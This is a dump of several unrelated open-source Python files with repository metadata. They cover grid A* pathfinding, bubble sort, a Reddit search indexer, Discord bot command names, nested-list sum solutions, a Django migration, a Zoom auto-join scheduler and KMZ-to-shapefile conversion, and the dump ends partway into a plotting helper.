2b97ae2edf5d76e8856d7d9435e4757b132c023d | 5,833 | py | Python | Grid.py | ivcafe413/corinthian-football | 7374f4439bc58085bc50bcd1fb7fb7973c5a1515 | [
"MIT"
] | null | null | null | Grid.py | ivcafe413/corinthian-football | 7374f4439bc58085bc50bcd1fb7fb7973c5a1515 | [
"MIT"
] | null | null | null | Grid.py | ivcafe413/corinthian-football | 7374f4439bc58085bc50bcd1fb7fb7973c5a1515 | [
"MIT"
] | null | null | null | import logging
import random
from collections import namedtuple
from typing import NamedTuple
from queue import PriorityQueue
from objects import BaseObject
from constants import NORTH, SOUTH, EAST, WEST
# Immutable grid coordinate (hashable, usable as a dict key).
Space = namedtuple("Space", ["x", "y"])
# TODO: Big TODO - Re-implement space with z/t value for terrain???
# SpaceMeta = namedtuple("SpaceMeta", ["actor", "terrain"], defaults=[None, "Blank"])
class SpaceMeta(NamedTuple):
    """Per-cell payload: the occupying actor (if any) and a terrain tag."""
    actor: BaseObject
    terrain: str = "Blank"
DIRECTIONS = [NORTH, SOUTH, WEST, EAST] # Maintained order, just cuz
# Unit offsets, index-aligned with DIRECTIONS above.
GRID_DIRECTIONS = [Space(0, -1), Space(0, 1), Space(-1, 0), Space(1, 0)]
def grid_direction(direction: int) -> Space:
    """Map a DIRECTIONS index to its unit-offset Space."""
    return GRID_DIRECTIONS[direction]

def grid_space_add(a: Space, b: Space) -> Space:
    """Component-wise sum of two Spaces."""
    return Space(a.x + b.x, a.y + b.y)

def grid_space_neighbor(space: Space, direction: int) -> Space:
    """The Space one step away from `space` in `direction`."""
    return grid_space_add(space, grid_direction(direction))
class Grid(dict):
    """dict mapping Space -> SpaceMeta, plus neighbor/cost queries.

    Keys are normalized: any (x, y) pair is coerced to a Space, and any
    value pair is coerced to a SpaceMeta on assignment.
    """
    def __setitem__(self, key, values):
        x,y = key
        # print(values)
        super().__setitem__(Space(x, y), SpaceMeta(*values))
    def __getitem__(self, key) -> SpaceMeta:
        x,y = key
        return super().__getitem__(Space(x, y))
    def neighbors(self, space: Space):
        """Yield adjacent Spaces that exist and are not blocked by a solid actor."""
        # space = Space(coordinates)
        for d in DIRECTIONS:
            neighbor = grid_space_neighbor(space, d)
            if neighbor in self:
                neighbor_object = self[neighbor].actor
                if neighbor_object is None or not neighbor_object.solid: # Can't traverse through solid objects
                    yield neighbor
    def random_neighbor(self, space: Space) -> Space:
        """Pick a uniformly random traversable neighbor.

        NOTE(review): randint raises ValueError if there are no valid
        neighbors -- confirm callers guarantee at least one exit.
        """
        valid_neighbors = list(self.neighbors(space))
        logging.info(valid_neighbors)
        # random.shuffle(valid_neighbors) # TODO: Unnecessary?
        r = random.randint(0, len(valid_neighbors) - 1)
        result = valid_neighbors[r]
        return result
    def cost(self, start: Space, end: Space):
        """Movement cost between adjacent spaces (uniform for now)."""
        return 1 # TODO: More complex movement cost
# A* Pathfinding
def path_find(start: tuple, goal: tuple, graph: Grid):
    """A* search from `start` to `goal` over `graph`.

    Returns (came_from, cost_so_far): `came_from` maps each reached Space to
    its predecessor (feed it to path_reconstruct); `cost_so_far` maps each
    reached Space to its cheapest known path cost.  grid_distance (Manhattan)
    is the heuristic; PriorityQueue ties fall back to tuple comparison of
    the Spaces themselves, which is well defined for namedtuples.
    """
    start = Space(*start)
    goal = Space(*goal)
    frontier = PriorityQueue()
    frontier.put((0, start))
    came_from = dict()
    came_from[start] = None
    cost_so_far = dict()
    cost_so_far[start] = 0
    while not frontier.empty():
        current = frontier.get()[1]
        if current == goal:
            break
        for next in graph.neighbors(current):
            new_cost = cost_so_far[current] + graph.cost(current, next)
            # Relax: take this edge if the space is new or now cheaper.
            if next not in cost_so_far or new_cost < cost_so_far[next]:
                cost_so_far[next] = new_cost
                priority = new_cost + grid_distance(next, goal)
                frontier.put((priority, next))
                came_from[next] = current
    return came_from, cost_so_far
# Dijkstra's Rangefinding
def range_find(start: tuple, range: int, graph: Grid):
    """Dijkstra flood-fill of every Space reachable within `range` cost.

    Returns (came_from, cost_so_far) with the same shapes as path_find.
    NOTE(review): the parameter `range` shadows the builtin, and
    `new_cost < range` excludes spaces at exactly `range` cost -- confirm
    whether the boundary should be inclusive.
    """
    start = Space(*start)
    frontier = PriorityQueue()
    frontier.put((0, start))
    came_from = dict()
    came_from[start] = None
    cost_so_far = dict()
    cost_so_far[start] = 0
    while not frontier.empty():
        current = frontier.get()[1]
        # No goal/early exit
        for next in graph.neighbors(current):
            new_cost = cost_so_far[current] + graph.cost(current, next)
            if new_cost < range and (next not in cost_so_far or new_cost < cost_so_far[next]):
                cost_so_far[next] = new_cost
                priority = new_cost
                frontier.put((priority, next))
                came_from[next] = current
    return came_from, cost_so_far
def path_reconstruct(start: tuple, goal: tuple, search_result: dict) -> list:
    """Rebuild the goal-to-start path from a came_from mapping.

    `search_result` is the came_from dict produced by path_find/range_find.
    The returned list is ordered goal-first; reversal is deliberately left
    to the caller (see the commented-out reverse below).
    """
    result_path = list()
    start = Space(*start)
    current = Space(*goal)
    while search_result[current] is not None:
        # Add current location to reverse path
        result_path.append(current)
        current = search_result[current]
    # Reached start, add start to path
    result_path.append(start)
    # Reverse the path to generate foward path TODO Optional flag?
    # result_path.reverse()
    return result_path
def grid_distance(a: Space, b: Space):
    """Manhattan (L1) distance between two grid spaces."""
    dx = abs(a.x - b.x)
    dy = abs(a.y - b.y)
    return dx + dy
# ----- Testing Area -----
def test_hash():
test_coordinates = (0, 0)
space_a = Space(test_coordinates)
space_b = Space(test_coordinates)
if not hash(space_a) == hash(space_b):
print("Hash equality NOT working")
else:
print("Hash equality working on named tuples")
def test_hash_to_non_named_tuple():
test_coordinates = (1, 1)
test_grid_space = Space((1, 1))
if not hash(test_coordinates) == hash(test_grid_space):
print("CanNOT compare hashes from named/non-named tuples")
else:
print("Can indeed compare hashes of regular and named tuples across")
def test_compare_tuple_named_tuple():
test_coordinates = (1, 1)
test_grid_space = Space((1, 1))
if not test_coordinates == test_grid_space:
print("CanNOT compare equality from named/non-named tuples")
else:
print("Can indeed compare equality of regular and named tuples across")
def test_grid_dict_subclass():
test_coordinates = (0, 0)
grid = Grid(1, 1)
# grid.map[space_a] = 5
grid[test_coordinates] = 5
# space_c = Space(0, 0)
test_get = grid[test_coordinates]
if not test_get == 5:
print("Hashtable set/fetch NOT working")
else:
print("Hashtable set and get by Space coordinates working")
def test_all():
    """Run every smoke test in this module, in the original order."""
    for check in (test_hash,
                  test_grid_dict_subclass,
                  test_hash_to_non_named_tuple,
                  test_compare_tuple_named_tuple):
        check()
if __name__ == "__main__":
    # Execute the module's smoke tests when run as a script.
    test_all()
2b97eff95c0bd2b394c9963727e6fead9c0d98c4 | 471 | py | Python | BubbleSort.py | Jutraman/SortingProblem | f3f1ea91fdfd44bc5fe523bd3a1dd7949222e71b | [
"BSD-3-Clause"
] | null | null | null | BubbleSort.py | Jutraman/SortingProblem | f3f1ea91fdfd44bc5fe523bd3a1dd7949222e71b | [
"BSD-3-Clause"
] | null | null | null | BubbleSort.py | Jutraman/SortingProblem | f3f1ea91fdfd44bc5fe523bd3a1dd7949222e71b | [
"BSD-3-Clause"
] | null | null | null | """
Project name: SortingProblem
File name: BubbleSort.py
Description:
version:
Author: Jutraman
Email: jutraman@hotmail.com
Date: 04/07/2021 21:49
LastEditors: Jutraman
LastEditTime: 04/07/2021
Github: https://github.com/Jutraman
"""
def bubble_sort(array):
    """Sort *array* in place (ascending) and return it.

    Classic bubble sort: after pass ``i`` the largest ``i + 1`` elements sit
    in their final positions, so every pass scans one element fewer.
    O(n^2) comparisons, O(1) extra space.
    """
    length = len(array)
    for i in range(length):
        # Stop one short of the sorted tail so array[j + 1] stays in range.
        # (The original scanned to length - i and raised IndexError on every
        # non-empty input because array[j + 1] could index array[length].)
        for j in range(length - i - 1):
            if array[j] > array[j + 1]:
                array[j], array[j + 1] = array[j + 1], array[j]
    return array
2b97f27689c29817d3fc17a2b5b71b9419f2063e | 6,023 | py | Python | indexerNew.py | philophilo/searchingReddit | 5c10dc70ecf6a614863403f28a91efe73c11fede | [
"MIT"
] | null | null | null | indexerNew.py | philophilo/searchingReddit | 5c10dc70ecf6a614863403f28a91efe73c11fede | [
"MIT"
] | null | null | null | indexerNew.py | philophilo/searchingReddit | 5c10dc70ecf6a614863403f28a91efe73c11fede | [
"MIT"
] | null | null | null | #!/home/master00/anaconda23/bin/python
from util import *
import argparse
import base64
import os
import json
from collections import defaultdict
# Two main type of indexes
# -- Forward index
# -- Inverted index
# Forward index
# doc1 -> [learning, python, how, to]
# doc2 -> [learning, c++]
# ...
# doc3 -> [python, c++]
# inverted index
# learning -> [doc1, doc2]
# python -> [doc1, doc3]
# how -> [doc1]
# to -> [doc1]
# c++ -> [doc2, doc3]
# TODO: improve this
# Indexer assumes that collection fits in ram
#
class Indexer(object):
    """In-memory builder of a forward and an inverted index.

    Assumes the whole collection fits in RAM and that add_document() is
    called at most once per (unique) url.
    """
    def __init__(self):
        # term -> list of (position, doc_id) postings.
        # defaultdict implements the original "TODO default dict" and removes
        # the manual "term not in index" check in add_document().
        self.inverted_index = defaultdict(list)
        # doc_id -> list of terms (the parsed document body)
        self.forward_index = dict()
        # url -> doc_id (ids are 1-based, assigned in insertion order)
        self.url_to_id = dict()
        self.doc_count = 0

    def add_document(self, url, parsed_text):
        """Register one document; *parsed_text* is its list of terms."""
        self.doc_count += 1
        assert url not in self.url_to_id
        current_id = self.doc_count
        self.url_to_id[url] = current_id
        print(self.url_to_id[url], "\t", current_id)
        self.forward_index[current_id] = parsed_text
        for position, term in enumerate(parsed_text):
            self.inverted_index[term].append((position, current_id))

    def save_on_disk(self, index_dir):
        """Dump all three structures as pretty-printed JSON into *index_dir*."""
        def dump_json_to_file(source, file_name):
            file_path = os.path.join(index_dir, file_name)
            json.dump(source, open(file_path, "w"), indent=4)
        dump_json_to_file(self.inverted_index, "inverted_index")
        dump_json_to_file(self.forward_index, "forward_index")
        dump_json_to_file(self.url_to_id, "url_to_id")
class Searcher(object):
    """Query side of the index: loads the JSON files written by Indexer.

    NOTE(review): this class is Python-2 only as written (``iteritems``,
    ``unicode`` and a ``print`` statement in find_documents_AND).
    """
    def __init__(self, index_dir):
        # Load inverted/forward indexes and the url<->id maps from index_dir.
        self.inverted_index = dict()
        self.forward_index = dict()
        self.url_to_id = dict()
        self.doc_count = dict()

        def load_json_from_file(file_name):
            # Helper: read one JSON structure from the index directory.
            file_path = os.path.join(index_dir, file_name)
            dst = json.load(open(file_path))
            return dst

        self.inverted_index = load_json_from_file("inverted_index")
        self.forward_index = load_json_from_file("forward_index")
        self.url_to_id = load_json_from_file("url_to_id")
        # Reverse map for get_url(); assumes urls and ids are one-to-one.
        self.id_to_url = {v : k for k,v in self.url_to_id.iteritems()}
    """
    # query [word1, word2] -> returns all documents that contain one of these words
    # sort of OR
    def find_documents(self, query_terms):
        return sum([self.inverted_index[word] for word in query_terms], [])
    """
    def generate_snippet(self, query_terms, doc_id):
        # Returns [(term, is_query_term)] around the "best" window of hits:
        # the window with the most distinct query words, ties broken by the
        # shortest window, padded by 15 terms on each side.
        query_terms_in_window = []
        best_window_len = 100500 # TODO: inf would be better ;)
        words_in_best_window = 0
        best_window = []
        for pos,word in enumerate(self.forward_index[unicode(doc_id)]):
            if word in query_terms:
                query_terms_in_window.append((word, pos))
                # NOTE(review): query_terms_in_window[0] is a (word, pos)
                # tuple, so comparing it with *word* looks always-False;
                # confirm whether [0][0] == word was intended.
                if len(query_terms_in_window) > 1 and query_terms_in_window[0] == word:
                    query_terms_in_window.pop(0)
                current_window_len = pos-query_terms_in_window[0][1] + 1
                # wiw = number of distinct query words in the current window
                wiw = len(set(map(lambda x: x[0], query_terms_in_window)))
                if wiw > words_in_best_window or (wiw == words_in_best_window and current_window_len < best_window_len):
                    words_in_best_window = wiw
                    best_window = query_terms_in_window[:]
                    best_window_len = current_window_len
        doc_len = len(self.forward_index[unicode(doc_id)])
        # TODO 15 should be a named constant
        snippet_start = max(best_window[0][1] - 15, 0)
        snippet_end = min(doc_len, best_window[len(best_window) - 1][1] + 1 + 15)
        return [(term, term in query_terms) for term in self.forward_index[unicode(doc_id)][snippet_start:snippet_end]]
    def find_documents_AND(self, query_terms):
        # Doc ids that contain ALL query terms.
        # docid -> number of query words
        docids = set()
        query_word_count = defaultdict(set)
        for query_word in query_terms:
            for (pos, docid) in self.inverted_index.get(query_word, []):
                try:
                    query_word_count[docid].add(query_word)
                except Exception as e:
                    print "Error:", e, self.inverted_index.get(query_word, [])
        return [docid for docid, unique_hits in query_word_count.iteritems() if len(unique_hits) == len(query_terms)]
    # sort of OR
    def find_documens_OR(self, query_terms):
        # Doc ids that contain ANY query term (name typo kept for callers).
        docids = set()
        for query_word in query_terms:
            for (pos, docid) in self.inverted_index.get(query_word, []):
                docids.add(docid)
        return docids
    def get_document_text(self, doc_id):
        # JSON object keys are strings, hence the unicode() conversion.
        return self.forward_index[unicode(doc_id)]
    def get_url(self, doc_id):
        # Original url for a document id (built in __init__).
        return self.id_to_url[doc_id]
def create_index_from_dir(stored_documents_dir, index_dir):
    """Index every stored page in *stored_documents_dir*, save to *index_dir*.

    File names are base16-encoded urls; contents are raw reddit posts.
    """
    indexer = Indexer()
    for filename in os.listdir(stored_documents_dir):
        stored = open(os.path.join(stored_documents_dir, filename))
        raw_text = stored.read()
        # TODO: words are separated not just by space but commas, semicolons, etc.
        terms = parseRedditPost(raw_text).split(" ")
        indexer.add_document(base64.b16decode(filename), terms)
    indexer.save_on_disk(index_dir)
def main():
    """CLI entry point: parse the two required directories and build the index."""
    parser = argparse.ArgumentParser(description='Index /r/learnprogramming')
    parser.add_argument("--stored_documents_dir",
                        dest="stored_documents_dir", required=True)
    parser.add_argument("--index_dir",
                        dest="index_dir", required=True)
    args = parser.parse_args()
    create_index_from_dir(args.stored_documents_dir, args.index_dir)

if __name__ == "__main__":
    main()
| 37.64375 | 120 | 0.65034 | 4,630 | 0.76872 | 0 | 0 | 0 | 0 | 0 | 0 | 1,308 | 0.217168 |
2b99df630754e76cc6e5831dd642cb6b5cc27841 | 3,169 | py | Python | main/cogs/commands.py | ParzivalEugene/Samurai | ff6236f4477c070b1f3ef3568256791324fc2bbf | [
"Apache-2.0"
] | 4 | 2021-04-04T16:21:58.000Z | 2021-07-13T20:33:41.000Z | main/cogs/commands.py | ParzivalEugene/Samurai | ff6236f4477c070b1f3ef3568256791324fc2bbf | [
"Apache-2.0"
] | null | null | null | main/cogs/commands.py | ParzivalEugene/Samurai | ff6236f4477c070b1f3ef3568256791324fc2bbf | [
"Apache-2.0"
] | 2 | 2021-06-20T17:06:57.000Z | 2021-06-20T17:07:48.000Z | from types import SimpleNamespace
class Names(SimpleNamespace):
    """Recursive attribute-access wrapper around a (possibly nested) dict.

    Every dict value becomes a nested Names instance, so
    ``Names({'a': {'b': 1}}).a.b == 1``. Extra keyword arguments are
    forwarded to SimpleNamespace and become plain attributes.
    """

    def __init__(self, dictionary, **kwargs):
        super().__init__(**kwargs)
        for name, item in dictionary.items():
            # Wrap nested dicts recursively; leave other values untouched.
            wrapped = Names(item) if isinstance(item, dict) else item
            setattr(self, name, wrapped)
# Mapping of cog name -> {action name -> bot command string}.
# Wrapped below into `commands_names` (a Names namespace) so commands can be
# referenced as attributes, e.g. commands_names.birthdays.add == "bd_add".
commands_names_dict = {
    "chatting": {
        "help": "help",
    },
    "birthdays": {
        "help": "bd_help",
        "set_chat": "bd_set_chat",
        "up_chat": "bd_up_chat",
        "del_chat": "bd_del_chat",
        "show_chat": "bd_show_chat",
        "add": "bd_add",
        "up": "bd_update",
        "delete": "bd_delete",
        "show_bd": "bd",
        "show_bds": "bd_show"
    },
    "translator": {
        "help": "tr_help",
        "translate": "tr_trans",
        "detect_language": "tr_detect_lang",
        "languages_list": "tr_list",
        "game_detect_languages": "tr_game"
    },
    "connect_four": {
        "help": "c4_help",
        "rules": "c4_rules",
        "init game": "c4",
        "place": "c4_place",
        "lose": "c4_lose"
    },
    "mini_cogs": {
        "help": "mini_help",
        "head_or_tails": "toss",
        "magic_ball": "8ball",
        "get_forecast": "forecast",
        "get_quote": "inspire"
    },
    "music_player": {
        "help": "player_help",
        "join": "join",
        "leave": "leave",
        "queue": "queue",
        "play": "play",
        "pause": "pause",
        "resume": "resume",
        "stop": "stop",
        "skip": "skip",
        "previous": "previous",
        "shuffle": "shuffle",
        "loop": "loop",
        "volume": "volume",
        "volume_up": "up",
        "volume_down": "down",
        "lyrics": "lyrics",
        "equalizer": "eq",
        "advanced_equalizer": "adveq",
        "now_playing": "np",
        "skip_to_current_index": "skipto",
        "restart": "restart",
        "seek": "seek",
    },
    "tic_tac_toe": {
        "game_help": "xo_help",
        "rules": "xo_rules",
        "init_game": "xo",
        "place": "xo_place",
        "lose": "xo_lose"
    },
    "level": {
        "help": "level_help",
        "add": "level_add",
        "up": "level_up",
        "delete": "level_del",
        "show_levels": "level_show",
        "show_level": "level",
        "dashboard": "level_dashboard"
    },
    "wikipedia": {
        "help": "wp_help",
        "wikipedia_search": "wp"
    },
    "glossary": {
        "help": "gl_help",
        "view_status": "gl",
        "set_language": "gl_lang",
        "set_vibe": "gl_vibe"
    }
}
# Public, attribute-style view of the mapping above.
commands_names = Names(commands_names_dict)
| 30.180952 | 51 | 0.408015 | 311 | 0.098138 | 0 | 0 | 0 | 0 | 0 | 0 | 1,312 | 0.414011 |
2b9b72a609da9b50aea8bfaf7b95a744bb5c29be | 1,831 | py | Python | scripts/practice/FB/NestedListWeightSum.py | bhimeshchauhan/competitive_programming | e0777bb0c425ffa03d8173a83e50ca55c4a3fcf5 | [
"MIT"
] | null | null | null | scripts/practice/FB/NestedListWeightSum.py | bhimeshchauhan/competitive_programming | e0777bb0c425ffa03d8173a83e50ca55c4a3fcf5 | [
"MIT"
] | 8 | 2020-09-05T16:04:31.000Z | 2022-02-27T09:57:51.000Z | scripts/practice/FB/NestedListWeightSum.py | bhimeshchauhan/competitive_programming | e0777bb0c425ffa03d8173a83e50ca55c4a3fcf5 | [
"MIT"
] | null | null | null | """
Nested List Weight Sum
You are given a nested list of integers nestedList. Each element is either an integer or a
list whose elements may also be integers or other lists.
The depth of an integer is the number of lists that it is inside of. For example,
the nested list [1,[2,2],[[3],2],1] has each integer's value set to its depth.
Return the sum of each integer in nestedList multiplied by its depth.
Example 1:
Input: nestedList = [[1,1],2,[1,1]]
Output: 10
Explanation: Four 1's at depth 2, one 2 at depth 1. 1*2 + 1*2 + 2*1 + 1*2 + 1*2 = 10.
Example 2:
Input: nestedList = [1,[4,[6]]]
Output: 27
Explanation: One 1 at depth 1, one 4 at depth 2, and one 6 at depth 3. 1*1 + 4*2 + 6*3 = 27.
Example 3:
Input: nestedList = [0]
Output: 0
Constraints:
1 <= nestedList.length <= 50
The values of the integers in the nested list is in the range [-100, 100].
The maximum depth of any integer is less than or equal to 50.
"""
# DFS
from collections import deque
class Solution:
    """Depth-weighted sum of a nested integer list (recursive DFS)."""

    def depthSum(self, nestedList):
        """Return the sum of every integer multiplied by its nesting depth."""
        def walk(items, depth):
            subtotal = 0
            for element in items:
                if element.isInteger():
                    subtotal += depth * element.getInteger()
                else:
                    # One level deeper for every enclosing list.
                    subtotal += walk(element.getList(), depth + 1)
            return subtotal

        return walk(nestedList, 1)
# BFS
class Solution:
    """Depth-weighted sum of a nested integer list (iterative BFS)."""

    def depthSum(self, nestedList):
        """Return the sum of every integer times its depth, level by level."""
        pending = deque(nestedList)
        total, depth = 0, 1
        while pending:
            # Everything currently queued belongs to the same depth level.
            for _ in range(len(pending)):
                item = pending.pop()
                if item.isInteger():
                    total += depth * item.getInteger()
                else:
                    pending.extendleft(item.getList())
            depth += 1
        return total
| 23.474359 | 92 | 0.592572 | 838 | 0.457673 | 0 | 0 | 0 | 0 | 0 | 0 | 950 | 0.518842 |
2b9c734ead852fe398bcf4cfccc73af317c3a224 | 52 | py | Python | torrenttv/utils/list_utils/__init__.py | AlexCovizzi/torrenttv | 25ae5490568110a7ea1f2e5eb74505ef8eea002d | [
"MIT"
] | null | null | null | torrenttv/utils/list_utils/__init__.py | AlexCovizzi/torrenttv | 25ae5490568110a7ea1f2e5eb74505ef8eea002d | [
"MIT"
] | 19 | 2020-05-03T17:06:24.000Z | 2021-03-11T05:26:57.000Z | torrenttv/utils/list_utils/__init__.py | AlexCovizzi/torrenttv | 25ae5490568110a7ea1f2e5eb74505ef8eea002d | [
"MIT"
] | 1 | 2020-05-04T19:00:00.000Z | 2020-05-04T19:00:00.000Z | from .flatten import flatten
__all__ = ["flatten"]
| 13 | 28 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.173077 |
2b9d72d72fd5c63abb08e7957792d60430f4fc1f | 490 | py | Python | metadeploy/api/migrations/0045_product_license_requirements.py | sfdc-qbranch/MetaDeploy | d22547b3814dbec6aefa4d86b9f81c6f175c1b67 | [
"BSD-3-Clause"
] | 33 | 2019-03-20T15:34:39.000Z | 2022-03-30T15:59:40.000Z | metadeploy/api/migrations/0045_product_license_requirements.py | sfdc-qbranch/MetaDeploy | d22547b3814dbec6aefa4d86b9f81c6f175c1b67 | [
"BSD-3-Clause"
] | 2,718 | 2019-02-27T19:46:07.000Z | 2022-03-11T23:18:09.000Z | metadeploy/api/migrations/0045_product_license_requirements.py | sfdc-qbranch/MetaDeploy | d22547b3814dbec6aefa4d86b9f81c6f175c1b67 | [
"BSD-3-Clause"
] | 28 | 2019-03-28T04:57:16.000Z | 2022-02-04T16:49:25.000Z | # Generated by Django 2.1.5 on 2019-01-28 21:04
import sfdo_template_helpers.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("api", "0044_merge_20190125_1502")]
operations = [
migrations.AddField(
model_name="product",
name="license_requirements",
field=sfdo_template_helpers.fields.MarkdownField(
blank=True, property_suffix="_markdown"
),
)
]
| 24.5 | 61 | 0.640816 | 369 | 0.753061 | 0 | 0 | 0 | 0 | 0 | 0 | 120 | 0.244898 |
2b9eb938fe54fa2c98c7980b235b4562b7169504 | 742 | py | Python | Zoom.py | NotSharwan/Zoom-Python-Bot | 2b063913ae24f0bee11a980a8b3b5d5f764a8ffe | [
"MIT"
] | null | null | null | Zoom.py | NotSharwan/Zoom-Python-Bot | 2b063913ae24f0bee11a980a8b3b5d5f764a8ffe | [
"MIT"
] | null | null | null | Zoom.py | NotSharwan/Zoom-Python-Bot | 2b063913ae24f0bee11a980a8b3b5d5f764a8ffe | [
"MIT"
] | null | null | null | import webbrowser
import time
import datetime
def openLink(url):
    """Open *url* in Chrome via its hard-coded Windows install path."""
    browser = webbrowser.BackgroundBrowser(
        "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")
    webbrowser.register('chrome', None, browser)
    webbrowser.get('chrome').open(url)
def zoomJoin(h, m, url):
    """Open *url* (a Zoom meeting link) every day at h:m for one year.

    h, m: hour and minute of the daily meeting on a 24-hour clock.
    url:  the Zoom invite link passed to openLink().
    """
    for _ in range(0, 365):
        now = datetime.datetime.today()
        target = datetime.datetime(now.year, now.month, now.day, h, m)
        # Roll over to tomorrow only when today's slot has already passed.
        # (The original tested `now.hour >= 2`, which is unrelated to the
        # meeting time and skipped a day at the wrong moments.)
        if target <= now:
            target += datetime.timedelta(days=1)
        # total_seconds() keeps the day component of the timedelta;
        # the original `.seconds` silently dropped whole days.
        time.sleep((target - now).total_seconds())
        openLink(url)
# Calling the Function (fill in your own values; the previous bare call
# `zoomJoin(h, m, Link)` crashed with NameError on import because
# h, m and Link were never defined):
# zoomJoin(h, m, Link)
# h = Hour in 24 format
# m = Minutes in 24 format
# Link = Paste the Zoom link in " " or ' '
"""
EXAMPLE:
zoomJoin(10, 00, "https://zoom.us/w/xxxxxxxxx")
"""
| 23.1875 | 71 | 0.638814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 254 | 0.342318 |
2b9fa2a8d5732bafdcbd0c0f7502d06854051c46 | 3,992 | py | Python | syspy/io/pandasshp/pandaskml.py | systragroup/quetzal | bb7934bcae588cddf0f0da810d75114d1c64768f | [
"CECILL-B"
] | 25 | 2018-11-20T16:33:02.000Z | 2022-03-03T12:46:52.000Z | syspy/io/pandasshp/pandaskml.py | systragroup/quetzal | bb7934bcae588cddf0f0da810d75114d1c64768f | [
"CECILL-B"
] | 14 | 2019-06-13T13:26:20.000Z | 2022-01-13T03:51:07.000Z | syspy/io/pandasshp/pandaskml.py | systragroup/quetzal | bb7934bcae588cddf0f0da810d75114d1c64768f | [
"CECILL-B"
] | 4 | 2020-01-31T18:34:59.000Z | 2022-03-18T17:22:45.000Z | import itertools
import json
import os
import zipfile
import kml2geojson
import pandas as pd
import shapely
from shapely import geometry
from syspy.io.pandasshp import pandasshp
from tqdm import tqdm
def list_files(path, patterns):
    """Recursively collect paths under *path* whose extension is in *patterns*.

    Extensions are compared case-insensitively; *patterns* holds lowercase
    extensions without the dot, e.g. ['kmz', 'kml']. Matches at each level
    come first (in os.listdir order), then matches from sub-directories.
    """
    entries = os.listdir(path)
    # Entries at this level whose extension matches.
    matched = [
        os.path.join(path, name)
        for name in entries
        if name.split('.')[-1].lower() in patterns
    ]
    # Then everything found in each sub-directory, depth-first.
    for name in entries:
        candidate = os.path.join(path, name)
        if os.path.isdir(candidate):
            matched.extend(list_files(candidate, patterns))
    return matched
def read_kmz_folder(folder):
    """Extract every named geometry from all .kmz files under *folder*.

    Each kmz is unzipped to a temporary kml, converted to GeoJSON with
    kml2geojson, and its features are collected. Returns a DataFrame with
    columns ['name', 'geometry', 'kml'] where 'kml' is the source file's
    path relative to *folder*.
    """
    geometries = []
    files = list_files(folder, ['kmz'])
    for filename in files:
        # ValueError: Unknown geometry type: geometrycollection
        kmz = zipfile.ZipFile(filename, 'r')
        # NOTE(review): neither kmz nor kml is explicitly closed here.
        kml = kmz.open('doc.kml', 'r')
        to_write = kml.read().decode()
        # Path of the source file relative to *folder*, with a .kml suffix.
        kmlname = filename.replace('.kmz', '.kml').split(folder)[1]
        # Scratch files are rewritten for every kmz in the folder.
        kmlfilename = folder + 'temp.kml'
        with open(kmlfilename, 'w') as test:
            test.write(to_write)
        kml2geojson.convert(
            kmlfilename,
            folder + 'temp'
        )
        with open(folder + 'temp/temp.geojson', 'r') as file:
            d = json.load(file)
        to_add = []
        for g in d['features']:
            try:
                to_add.append(
                    (
                        g['properties']['name'],
                        shapely.geometry.shape(g['geometry']),
                        kmlname
                    )
                )
            except Exception:
                # Best-effort: skip features without a name or with a
                # geometry shapely cannot build (e.g. geometrycollection).
                print('fail')
        geometries += to_add
    return pd.DataFrame(geometries, columns=['name', 'geometry', 'kml'])
def read_kmz(folder, kmzname):
    """Extract geometries from one .kmz, one KML <Folder> at a time.

    The doc.kml is split on its <Folder> elements; each folder's content is
    re-inserted into the document skeleton, converted to GeoJSON, and its
    features collected. Returns a DataFrame with columns
    ['name', 'desc', 'geometry', 'kmz', 'folder'].
    """
    # Tolerate kmzname given with or without the .kmz extension.
    kmzfilename = (folder + kmzname + '.kmz').replace('.kmz.kmz', '.kmz')
    geometries = []
    # ValueError: Unknown geometry type: geometrycollection
    kmz = zipfile.ZipFile(kmzfilename, 'r')
    with kmz.open('doc.kml', 'r') as kml:
        to_write = kml.read().decode()
    # Document skeleton with a %s placeholder where one <Folder> body goes.
    to_format = to_write.split('<Folder>')[0] + '%s' + to_write.split('</Folder>')[-1]
    # Inner text of every <Folder>...</Folder> element.
    insert_strings = [s.split('</Folder>')[0] for s in to_write.split('<Folder>')[1:]]
    kmlfilename = folder + 'temp.kml'
    for insert in tqdm(insert_strings):
        to_add = []
        # The folder's display name from its first <name> element.
        name = insert.split('<name>')[1].split('</name>')[0]
        to_write = to_format % insert
        with open(kmlfilename, 'w') as file:
            file.write(to_write)
        kml2geojson.convert(
            kmlfilename,
            folder + 'temp'
        )
        with open(folder + 'temp/temp.geojson', 'r') as file:
            d = json.load(file)
        print(len(d['features']))
        for g in d['features']:
            try:
                desc = g['properties']['description']
            except Exception:
                desc = ''
            try:
                to_add.append(
                    (
                        g['properties']['name'],
                        desc,
                        shapely.geometry.shape(g['geometry']),
                        kmzname,
                        name
                    )
                )
            except ValueError:  # Unknown geometry type: geometrycollection
                pass
        geometries += to_add
    layers = pd.DataFrame(
        geometries,
        columns=['name', 'desc', 'geometry', 'kmz', 'folder']
    )
    return layers
def write_shp_by_folder(layers, shapefile_folder, **kwargs):
    """Write one shapefile per distinct 'folder' value found in *layers*.

    Extra keyword arguments are forwarded to pandasshp.write_shp. Folders
    that fail with a KeyError are reported and skipped.
    """
    for folder_name in tqdm(set(layers['folder'])):
        try:
            subset = layers.loc[layers['folder'] == folder_name]
            target = shapefile_folder + '//' + folder_name + '.shp'
            pandasshp.write_shp(target, subset, **kwargs)
        except KeyError:
            # Keep going; just report which folder could not be written.
            print(folder_name)
| 27.916084 | 86 | 0.510271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 571 | 0.143036 |
2ba14a323b129afb523e5528fb8af1dd3e946a61 | 1,556 | py | Python | utils/plots.py | vovamedentsiy/mpdnn | 9d5966a95a27c8c9037c46cbc50d91fe8d387c1e | [
"MIT"
] | null | null | null | utils/plots.py | vovamedentsiy/mpdnn | 9d5966a95a27c8c9037c46cbc50d91fe8d387c1e | [
"MIT"
] | 1 | 2021-03-26T07:53:19.000Z | 2021-03-26T14:47:23.000Z | utils/plots.py | vovamedentsiy/mpdnn | 9d5966a95a27c8c9037c46cbc50d91fe8d387c1e | [
"MIT"
] | null | null | null | import matplotlib
matplotlib.use('PS')
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
import random
def autolabel(rects, ax, coeff = 1):
    """Annotate each bar in *rects* with its height rendered as a percentage.

